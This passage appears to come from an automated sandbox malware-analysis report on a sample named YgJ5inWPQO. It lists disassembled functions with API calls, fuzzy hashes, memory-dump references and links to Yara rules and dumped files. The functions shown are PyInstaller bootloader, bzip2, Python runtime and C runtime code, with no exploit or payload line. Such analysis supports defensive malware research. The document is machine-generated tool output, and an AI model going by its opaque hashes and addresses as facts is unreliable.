                                                                                                                                                                                                      • Instruction ID: 800e1fb27ac5018b642889fb47af4603cd1cc7e9eef718e4e1f04dbc4b854fea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31b2bb2a81d768a39f46c27a77fbce41591dc4b3623782c16d271c9a058ee8dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1421C3A3A19A0281FB559B3DDC55378A2A0FF48B59F089135CB0F4A2A5DF7CE849C319
                                                                                                                                                                                                      Function 00007FF7FF5A7DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                      • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                      • Instruction ID: 314685293357904ecf1fac36fb6cc006a5f6e1658bc41e2d049bf9b4e829f8ba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C119331B18A8186E750AB56F854369A7A0FB88BE4F840334EA7D877E4DF3CD81487D0
                                                                                                                                                                                                      Function 00007FFBBB61198C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Arg_CallocKeywordsMem_MemoryParseStringTuple
                                                                                                                                                                                                      • String ID: Invalid filter specifier for delta filter$|OO&
                                                                                                                                                                                                      • API String ID: 2765563044-2010576982
                                                                                                                                                                                                      • Opcode ID: 2affb9fe1f810740de34073636c008aaeae26a8f4f44c9b42a9fdf508e638553
                                                                                                                                                                                                      • Instruction ID: 3ebab33c44416e6d39e4451c41bf828ca39652feaceaf18142ac32b85e8404da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2affb9fe1f810740de34073636c008aaeae26a8f4f44c9b42a9fdf508e638553
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C011F3F6A09A0396EB048F28E845278B7A4FB49B54F549135DB1E42370EF7DE84AC748
                                                                                                                                                                                                      Function 00007FFBBB611900 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Arg_CallocKeywordsMem_MemoryParseStringTuple
                                                                                                                                                                                                      • String ID: Invalid filter specifier for BCJ filter$|OO&
                                                                                                                                                                                                      • API String ID: 2765563044-3728029529
                                                                                                                                                                                                      • Opcode ID: 7064889e55b6df43a5fe35f716f8e70b3d3ceef0c1046b6eb05edbc02d36a5e3
                                                                                                                                                                                                      • Instruction ID: 3be08fffc74d21c3700496f28f078a6a6c2a4e9879fe18d2936d48180961d7d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7064889e55b6df43a5fe35f716f8e70b3d3ceef0c1046b6eb05edbc02d36a5e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 440105F1A09A4685EB04CF38DC45278B3A4BB44B54F509035CB1E42370EF3DE90AC398
                                                                                                                                                                                                      Function 00007FFBBB63C800 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFBBB63C80D
                                                                                                                                                                                                        • Part of subcall function 00007FFBBB63C7BC: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FFBBB63B042), ref: 00007FFBBB63C7F2
                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFBBB63C839
                                                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBBB63C853
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • 1.0.8, 13-Jul-2019, xrefs: 00007FFBBB63C813
                                                                                                                                                                                                      • bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth, xrefs: 00007FFBBB63C820
                                                                                                                                                                                                      • *** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac, xrefs: 00007FFBBB63C842
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __acrt_iob_func$__stdio_common_vfprintfexit
                                                                                                                                                                                                      • String ID: bzip2/libbzip2: internal error number %d.This is a bug in bzip2/libbzip2, %s.Please report it to: bzip2-devel@sourceware.org. If this happenedwhen you were using some program which uses libbzip2 as acomponent, you should also report this bug to the auth$*** A special note about internal error number 1007 ***Experience suggests that a common cause of i.e. 1007is unreliable memory or other hardware. The 1007 assertionjust happens to cross-check the results of huge numbers ofmemory reads/writes, and so ac$1.0.8, 13-Jul-2019
                                                                                                                                                                                                      • API String ID: 77255540-989448446
                                                                                                                                                                                                      • Opcode ID: bbeb2fe21641ba72e23235041d2a957e10d8786f8ff80ce4925099a74c7efcec
                                                                                                                                                                                                      • Instruction ID: b0c9d2799752b6013752321d56d706a05865847dcbd6af131aa0fdaabaca08ee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbeb2fe21641ba72e23235041d2a957e10d8786f8ff80ce4925099a74c7efcec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E039A2A0860752FA185B7CEC95274A365BF14700F00C03EDB0F072B2EEAC2D05C2A9
                                                                                                                                                                                                      Function 00007FFBBCD4967C Relevance: 9.2, APIs: 6, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$NameName::
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 168861036-0
                                                                                                                                                                                                      • Opcode ID: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                      • Instruction ID: 3cd00e72fbf57066d70ce0f7cf1f1acb310c40e785f3af613489bc68076106f3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb95027d3fcee506583ce7d96f70b522a78626fdc6e378da2ca402aa0a92e4da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D7188FAB18A5288FB10CB7ED8883AC37A5BB40784F588035DB2D07695DF79E846C704
                                                                                                                                                                                                      Function 00007FF7FF588560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588592
                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5885E9
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF589400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7FF5845E4,00000000,00007FF7FF581985), ref: 00007FF7FF589439
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF588678
                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886E4
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF5886F5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF7FF589216), ref: 00007FF7FF58870A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                      • Opcode ID: 6dbcf2dde03bb6a38809b7a2ae0e65b19fecec932480a4a95577cfdf2dcaf52f
                                                                                                                                                                                                      • Instruction ID: dc71c123385a93be16f486061bf5243f00c909a177be6d40365a02fc510fd84e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6dbcf2dde03bb6a38809b7a2ae0e65b19fecec932480a4a95577cfdf2dcaf52f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41A462B196C241EB30BB12A5446EAA3A4FB84BC5F840235DF7D97BC5DE3CD501C7A4
                                                                                                                                                                                                      Function 00007FFBBB632BF8 Relevance: 9.1, APIs: 6, Instructions: 115threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 722544280-0
                                                                                                                                                                                                      • Opcode ID: 1ec775829b225900bde4c9dbe14ace5db717f71bae4f6aececd6e8635a69a766
                                                                                                                                                                                                      • Instruction ID: c8d042a03b291b0e15a657c4e83d7863a3a23200ea34af7e586f0fbe345e45ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ec775829b225900bde4c9dbe14ace5db717f71bae4f6aececd6e8635a69a766
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F14173A3A05B0296EAA59B3DDD04378A2A0FB54B54F188235DF5E437A5DF3CEC51C348
                                                                                                                                                                                                      Function 00007FFBBB633414 Relevance: 9.1, APIs: 6, Instructions: 111threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507696476.00007FFBBB631000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFBBB630000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507671623.00007FFBBB630000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507748441.00007FFBBB641000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507768534.00007FFBBB642000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb630000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeallocEval_Thread$Bytes_FromList_RestoreSaveSizeString
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 722544280-0
                                                                                                                                                                                                      • Opcode ID: ccc0e9a76ea1aa43825ab1fd4ac5b019393842f9738757de9c5c8e866fa1cb40
                                                                                                                                                                                                      • Instruction ID: ffea4b87c140646e8825ada27c124ce744647f3810309753819a51b6dde51a3e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccc0e9a76ea1aa43825ab1fd4ac5b019393842f9738757de9c5c8e866fa1cb40
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 404152B3A1975282EA608B3DE84476CA2A4FB48BA4F158235DF5E437E5DF3CE841C704
                                                                                                                                                                                                      Function 00007FFBBCD450B0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507818191.00007FFBBCD41000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFBBCD40000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507793399.00007FFBBCD40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507910297.00007FFBBCD59000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507939034.00007FFBBCD5A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbcd40000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3741236498-0
                                                                                                                                                                                                      • Opcode ID: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
                                                                                                                                                                                                      • Instruction ID: d5aa2caf8389565c1bf32c60708093249cce958bd3b217a8158a713d8e8a0ef5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d800493cf60e4af3f4a7c920cc646ece182b7dab7bd32bb736cb4877c8bf044e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A31A1BAB19B5191EA15CF39E81856933A0BF09FE4B954632DF2D03380EE3DD842C304
                                                                                                                                                                                                      Function 00007FF7FF5890E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetCurrentProcess.KERNEL32 ref: 00007FF7FF588780
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: OpenProcessToken.ADVAPI32 ref: 00007FF7FF588793
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetTokenInformation.ADVAPI32 ref: 00007FF7FF5887B8
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetLastError.KERNEL32 ref: 00007FF7FF5887C2
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: GetTokenInformation.ADVAPI32 ref: 00007FF7FF588802
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7FF58881E
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588760: CloseHandle.KERNEL32 ref: 00007FF7FF588836
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF58916C
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF7FF583C55), ref: 00007FF7FF589175
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                      • Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                      • Instruction ID: 41f2051c5beebed55413ace6f294a047302673919fb108bd8f297b157899db18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92213C21A096C282F710BB10E5152EAA6A0FF88780FC44235EA7D53BD6EF3CD805C7E0
                                                                                                                                                                                                      Function 00007FF7FF59B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B347
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B37D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3AA
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3BB
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3CC
                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7FF594F81,?,?,?,?,00007FF7FF59A4FA,?,?,?,?,00007FF7FF5971FF), ref: 00007FF7FF59B3E7
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1498290225.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498251254.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498348217.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498718934.00007FF7FF5C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1498764854.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                      • Opcode ID: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                      • Instruction ID: 8a73e7bb8976d04809ad3fe8a4c7c1b5a068a81604ddb3850d1a07ef3e2e945e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508bc4e8de0e80a19cd6daf9ed8871fa40715e6eab000f8b832e18dd1cfec2a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6116A24A0D6D692FB6CB32156811BDE2865F447A0FD48338E93E477EADE2CE50183A0
                                                                                                                                                                                                      Function 00007FFBBB6103F8 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyLong_FromUnsignedLongLong.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610410
                                                                                                                                                                                                      • PyUnicode_InternFromString.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB610421
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB61043C
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB6155EE
                                                                                                                                                                                                      • _Py_Dealloc.PYTHON313(?,?,?,00007FFBBB6102F5,?,?,?,00007FFBBB6102A2,?,?,?,?,?,00007FFBBB61022C), ref: 00007FFBBB615607
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.1507537143.00007FFBBB601000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFBBB600000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507511842.00007FFBBB600000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB617000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507625049.00007FFBBB622000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.1507647689.00007FFBBB623000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffbbb600000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
